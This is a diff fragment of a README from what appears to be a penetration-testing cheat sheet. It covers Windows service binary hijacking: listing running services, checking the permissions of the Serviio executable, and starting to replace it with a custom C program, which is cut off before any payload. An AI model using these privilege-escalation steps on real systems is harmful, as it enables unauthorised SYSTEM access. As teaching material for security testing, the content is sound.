seeu-inspace/easyg/README.md

 #### <ins>Insecure File Permissions</ins>

+Also called "Service Binary Hijacking".
 Exploit insecure file permissions on services that run as nt authority\system
 1. List running services on Windows using PowerShell `Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}`
-2. Notice services installed in the Program Files directory, this means that it's user-installed (for this example, Serviio)
-3. Enumerate the permissions on the target service `icacls "C:\Program Files\Serviio\bin\ServiioService.exe"`
+2. Enumerate the permissions on the target service `icacls "C:\Program Files\Serviio\bin\ServiioService.exe"`
    - For this scenario, any user (BUILTIN\Users) on the system has full read and write access to it
    - See also "[Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation](https://www.exploit-db.com/exploits/41959)"
-4. Substitute `ServiioService.exe` with the following
+3. Substitute `ServiioService.exe` with the following
    ```C
    #include <stdlib.h>
    int main () {